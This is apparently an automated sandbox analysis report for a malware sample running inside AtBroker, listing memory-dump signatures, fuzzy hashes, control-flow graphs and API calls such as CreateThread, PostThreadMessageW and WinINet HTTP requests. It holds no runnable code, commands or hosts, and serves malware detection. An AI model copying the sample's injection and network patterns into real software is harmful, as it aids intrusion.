                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                                    • Instruction ID: ea16fb98e45fb0956d81b4fcb0b9b814cee72ae1598f6336b8c23751fef10d98
                                                                    • Opcode Fuzzy Hash: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                                    • Instruction Fuzzy Hash: 70900225211400032105B558170850710869BD5365359C031F1016550CD621D9616121
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                                    • Instruction ID: d8c26501daa214b711e123375dab88a1aface8516e5b9be43e8b9ec29a60d13f
                                                                    • Opcode Fuzzy Hash: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                                    • Instruction Fuzzy Hash: 60900225221400032145B558160850B1485ABD6365399C035F1417590CC621D9656321
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                                    • Instruction ID: 2210919ebb985fc7b54288cf86f9faab11afb86523914287cf8a27189a71d337
                                                                    • Opcode Fuzzy Hash: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                                    • Instruction Fuzzy Hash: A790026120240003610571585418616504A9BE0215B59C031E1015590DC525D9917125
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                                    • Instruction ID: 11bfd8b6d539e6d8c1a646d502600f8d04fe8af5d7cc921c0c26a7b36145c1f0
                                                                    • Opcode Fuzzy Hash: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                                    • Instruction Fuzzy Hash: 6E90023120140803F1807158540864A10459BD1315F99C035A0026654DCA15DB5977A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                                    • Instruction ID: 8071c73653cca747197d48c6b29558b3e4cbf58a0afbd7c3ae752d22714ae6bf
                                                                    • Opcode Fuzzy Hash: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                                    • Instruction Fuzzy Hash: D190023120544843F14071585408A4610559BD0319F59C031A0065694D9625DE55B661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                                    • Instruction ID: a403c4c12489cde3cbecb6537161de93861404ef4ead4d022622d046854b5eeb
                                                                    • Opcode Fuzzy Hash: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                                    • Instruction Fuzzy Hash: 6D90023160540803F1507158541874610459BD0315F59C031A0025654D8755DB5576A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2a0d410adcb406a296ccd1493362cfbf26e39276cc78a31916c31c46b3766ab0
                                                                    • Instruction ID: ddfaf5d1d59a98bea485d8cd0c67062fa3829cbf76a14ab9ce83f76ee9402ac3
                                                                    • Opcode Fuzzy Hash: 2a0d410adcb406a296ccd1493362cfbf26e39276cc78a31916c31c46b3766ab0
                                                                    • Instruction Fuzzy Hash: C990023160550403F1007158551870620459BD0215F69C431A0425568D8795DA5175A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8e15fa2f12474b43a0655156cd0d4df47bf7cdef53e8bf5bd432ba38d5cefb98
                                                                    • Instruction ID: 9d1038ba5bec9f33f473240ec7c12cac4c2818b52b13c284bd9836453deddd8f
                                                                    • Opcode Fuzzy Hash: 8e15fa2f12474b43a0655156cd0d4df47bf7cdef53e8bf5bd432ba38d5cefb98
                                                                    • Instruction Fuzzy Hash: E690022124140803F140715894187071046DBD0615F59C031A0025554D8616DA6576B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                                    • Instruction ID: 36b25106e46cf3070012a1eb2d4a4d7bb24cbd0ec34bba7d8f77bf6aeaa62e29
                                                                    • Opcode Fuzzy Hash: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                                    • Instruction Fuzzy Hash: 6690022124545103F150715C54086165045BBE0215F59C031A0815594D8555D9557221
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: ea1264e73a4f07bafa6a29254b08ed40cc215dc9537c682b3561b3ecc4df4307
                                                                    • Instruction ID: 6098b363e64204b3549da9e1f6bbdd4e2af304702408a17279821c76749d124b
                                                                    • Opcode Fuzzy Hash: ea1264e73a4f07bafa6a29254b08ed40cc215dc9537c682b3561b3ecc4df4307
                                                                    • Instruction Fuzzy Hash: 7BE1A2B1D00208AFDB14DFA5CC91AEFB7B9AF44309F04415FE509A6341E7786B45CBAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: a79ef303b6dacb5b259504787586267dc353237c903efeefeab9c39446d55bb9
                                                                    • Instruction ID: 4cf2d035de1f30a07569a42ed1eef507d3591a096d72b3806acdfb36847ae3d5
                                                                    • Opcode Fuzzy Hash: a79ef303b6dacb5b259504787586267dc353237c903efeefeab9c39446d55bb9
                                                                    • Instruction Fuzzy Hash: E771A2B1C00208AEDB24DF62DC51FEFB779AF44309F04455FE509A2242E7786B55CBAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 27 4cadd8-4cadda 28 4caddc-4cae11 call 4c1400 call 4e2610 27->28 29 4cae4a-4cb176 27->29 45 4cae30-4cae35 28->45 46 4cae13-4cae2f call 4ec0a7 CreateThread 28->46 31 4cb17d-4cb184 29->31 33 4cb1b6-4cb1c0 31->33 34 4cb186-4cb1b4 31->34 36 4cb1d1-4cb1d8 33->36 34->31 38 4cb1da-4cb201 36->38 39 4cb203-4cb20a 36->39 38->36 40 4cb20c-4cb23f 39->40 41 4cb241-4cb24b 39->41 40->39 44 4cb25c-4cb268 41->44 47 4cb27f 44->47 48 4cb26a-4cb27d 44->48 51 4cb286-4cb28f 47->51 48->44 53 4cb2ab-4cb2bc 51->53 54 4cb291-4cb2a9 51->54 55 4cb2cd-4cb2d9 53->55 54->51 56 4cb2ec-4cb2f6 55->56 57 4cb2db-4cb2ea 55->57 59 4cb2f8-4cb317 56->59 60 4cb32a-4cb32e 56->60 57->55 63 4cb328 59->63 64 4cb319-4cb322 59->64 61 4cb349-4cb350 60->61 62 4cb330-4cb347 60->62 65 4cb3a2-4cb3e5 61->65 66 4cb352-4cb372 61->66 62->60 63->56 64->63 69 4cb3f6-4cb3ff 65->69 67 4cb379-4cb37b 66->67 68 4cb374-4cb378 66->68 70 4cb38c-4cb3a0 67->70 71 4cb37d-4cb386 67->71 68->67 72 4cb40f-4cb413 69->72 73 4cb401-4cb40d 69->73 70->61 71->70 75 4cb41f 72->75 76 4cb415-4cb41c 72->76 73->69 77 4cb426-4cb42f 75->77 76->75 78 4cb63f-4cb646 77->78 79 4cb435-4cb43f 77->79 81 4cb64c call 4ea740 78->81 82 4cb742-4cb74c 78->82 80 4cb450-4cb459 79->80 83 4cb45b-4cb468 80->83 84 4cb475-4cb479 80->84 88 4cb651-4cb655 81->88 86 4cb46a-4cb470 83->86 87 4cb473 83->87 89 4cb47b-4cb4a0 84->89 90 4cb4a2-4cb4ac 84->90 86->87 87->80 92 4cb678-4cb682 88->92 93 4cb657-4cb676 88->93 89->84 94 4cb4bd-4cb4c6 90->94 95 4cb693-4cb69f 92->95 93->88 96 4cb4dc-4cb4df 94->96 97 4cb4c8-4cb4da 94->97 98 4cb6b6-4cb6bd 95->98 99 4cb6a1-4cb6b4 95->99 101 4cb4e5-4cb4ec 96->101 97->94 103 4cb6bf-4cb6e7 98->103 104 4cb6e9-4cb6ed 98->104 99->95 105 4cb4ee-4cb521 101->105 106 4cb523-4cb532 101->106 103->98 109 4cb6ef-4cb714 104->109 110 4cb716-4cb71d 104->110 105->101 107 4cb539-4cb543 106->107 108 4cb534 106->108 112 4cb554-4cb55d 107->112 108->78 109->104 110->82 111 4cb71f-4cb735 110->111 113 4cb737-4cb73d 111->113 114 4cb740 111->114 115 4cb56d-4cb574 112->115 116 4cb55f-4cb56b 112->116 113->114 114->110 118 4cb595-4cb5a9 115->118 119 4cb576-4cb593 115->119 116->112 120 4cb5ba-4cb5c6 118->120 119->115 121 4cb5c8-4cb5d5 120->121 122 4cb5d7-4cb5e3 120->122 121->120 124 4cb5e5-4cb600 122->124 125 4cb602-4cb60c 122->125 124->122 126 4cb61d-4cb629 125->126 127 4cb63a 126->127 128 4cb62b-4cb638 126->128 127->77 128->126
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 004CAE25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID: "R$,9$.|$9V$F)$Fq$G$H$Kb$Le$U$V`$W$a@$b$e$f$m$t[$u
                                                                    • API String ID: 2422867632-2431676184
                                                                    • Opcode ID: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                                                    • Instruction ID: 6ad058ad1f891d83bb2a447b33ced107ca03a7faab54128f2356a5dea41e9772
                                                                    • Opcode Fuzzy Hash: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                                                    • Instruction Fuzzy Hash: E2917BB0905668CBFB208F91CD59BDEBAB1BB45308F1085D9D14C3B281C7BA1A89CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 652 4d1f32-4d1f36 653 4d1f37-4d1f44 652->653 654 4d1fa9-4d1fb2 653->654 655 4d1f46-4d1f5c 653->655 657 4d1fb8-4d1fea call 4c1400 call 4e2610 654->657 658 4d1fb3 call 4d57a0 654->658 655->653 656 4d1f5e-4d1f77 655->656 664 4d1fec-4d1ffb PostThreadMessageW 657->664 665 4d200a-4d2010 657->665 658->657 664->665 666 4d1ffd-4d2007 664->666 666->665
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(s5497I81,00000111,00000000,00000000), ref: 004D1FF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: s5497I81$s5497I81
                                                                    • API String ID: 1836367815-2486582339
                                                                    • Opcode ID: 2e25d50d07a5c4463eb2a3eb58a097cbc9ec7a7fa90a3babf27bc5a44e5dc792
                                                                    • Instruction ID: eb212e3ec32d19674ba60c2bbbbaba8706c69113d0aaeed79da3b92b4dd2cc36
                                                                    • Opcode Fuzzy Hash: 2e25d50d07a5c4463eb2a3eb58a097cbc9ec7a7fa90a3babf27bc5a44e5dc792
                                                                    • Instruction Fuzzy Hash: 1D115B71E0014C7BDB109B548C82EAFB7ACEB91758F5081AAFD14D3301E7289D0347A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 680 4d1f78-4d1fea call 4eab50 call 4eb560 call 4d57a0 call 4c1400 call 4e2610 691 4d1fec-4d1ffb PostThreadMessageW 680->691 692 4d200a-4d2010 680->692 691->692 693 4d1ffd-4d2007 691->693 693->692
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(s5497I81,00000111,00000000,00000000), ref: 004D1FF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: s5497I81$s5497I81
                                                                    • API String ID: 1836367815-2486582339
                                                                    • Opcode ID: 4703a5d62aeafafa3a58f86cceb7fe740a4ec74cea0cc5c2ad6072beec465e45
                                                                    • Instruction ID: 5423face1c6476bb0534fc6b59edb73f619fcde5723734311040fda4c6ce9178
                                                                    • Opcode Fuzzy Hash: 4703a5d62aeafafa3a58f86cceb7fe740a4ec74cea0cc5c2ad6072beec465e45
                                                                    • Instruction Fuzzy Hash: 5D11CC72D0024C7EEB11ABA18C92DEFBB7CDF41798F04815AFA04A7241D6685E0687B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(s5497I81,00000111,00000000,00000000), ref: 004D1FF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: s5497I81$s5497I81
                                                                    • API String ID: 1836367815-2486582339
                                                                    • Opcode ID: 516bda7149a8f5c1c788523022d8cb9f40ec61f38ef57ce16b1c9377a58f403e
                                                                    • Instruction ID: 166be3d54cbbc88080439aecca46aaf04c0bc0e237cee99edb36b9be5faa6ea1
                                                                    • Opcode Fuzzy Hash: 516bda7149a8f5c1c788523022d8cb9f40ec61f38ef57ce16b1c9377a58f403e
                                                                    • Instruction Fuzzy Hash: CF01D671D0024C7EEB11ABE28C82DEF7B7CDF41798F04816AFA04A7201D6685E0687B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 38c14d3180c8e7b186a0ec86d74c63e70dc00fe02bef95bea9938157abcb006e
                                                                    • Instruction ID: 74c1f8a021388ea1d3e7949b73024f3b913e9fa8e23535367466fdee000db2d3
                                                                    • Opcode Fuzzy Hash: 38c14d3180c8e7b186a0ec86d74c63e70dc00fe02bef95bea9938157abcb006e
                                                                    • Instruction Fuzzy Hash: 6C317E71601704ABD714DF65C885FE7BBA8FB88305F00462EFA1D5B245D774BA04CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 004DFF87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 2538663250-2016760708
                                                                    • Opcode ID: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
                                                                    • Instruction ID: 3a7929b4f6e148031c666f76d1e96aa74c9460d8f7324fdda4f8f5bbe25ce5de
                                                                    • Opcode Fuzzy Hash: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
                                                                    • Instruction Fuzzy Hash: 05314FB5A0020A9FDB10DFD9D8809EFB3B9FF88304F108559E915AB205D775EE458BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                                                    • Instruction ID: d3a83b6207e8105d1c7805eb2500031245ae9026c405e9788cb7e3a504d59341
                                                                    • Opcode Fuzzy Hash: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                                                    • Instruction Fuzzy Hash: 0011C2316081211FDB12AE34CD5549E77B5EB413507188A57D495C7397F629DD07C6C8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetConnectA.WININET(?,?,?,?,?,00000000,?,?), ref: 004E9416
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID:
                                                                    • API String ID: 3050416762-0
                                                                    • Opcode ID: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                                                    • Instruction ID: e9169e9ae6bb6fdeb697262003d33a4769586801f13e72ea57cf34ec187660ea
                                                                    • Opcode Fuzzy Hash: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                                                    • Instruction Fuzzy Hash: 4311CBB1915219AFCB50DFA9D841EEF7BF8EF4C214F0541AAF90CE3241E63499118BA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • HttpOpenRequestA.WININET(?,?,?,?,?,00000000,?,?), ref: 004E94A6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID:
                                                                    • API String ID: 1984915467-0
                                                                    • Opcode ID: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                                                    • Instruction ID: fd2212f196099903680589700abea2ffb03ff66b4ed3ae91fe9f07efcad555a6
                                                                    • Opcode Fuzzy Hash: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                                                    • Instruction Fuzzy Hash: 3A11E9B1914219AFCB50DFA9D841EEF7BF8EF4C214F0441AAF908E3201E63499108BA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetOpenA.WININET(?,?,?,?,?), ref: 004E938A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID:
                                                                    • API String ID: 2038078732-0
                                                                    • Opcode ID: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                                                    • Instruction ID: aa70f71c12d387fa525d8debfc50b22f43f2712950026a6e28e3c0504cf20d27
                                                                    • Opcode Fuzzy Hash: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                                                    • Instruction Fuzzy Hash: 3A11B1B1D15219AFCB50DFE9D845AEF77F8EF48210F0441AAED08E7241E6349A1487E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • HttpSendRequestA.WININET(?,?,?,?,?), ref: 004E952A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID:
                                                                    • API String ID: 360639707-0
                                                                    • Opcode ID: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                                                    • Instruction ID: dc12167427a0111d98073fe3660016785f1938fdc660fee772189feae58e122a
                                                                    • Opcode Fuzzy Hash: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                                                    • Instruction Fuzzy Hash: 9C11B1B1D15119AFCB54DFA9D845AEF77F8EF48214F0441AAE908E7201D634991087E5
                                                                    Uniqueness

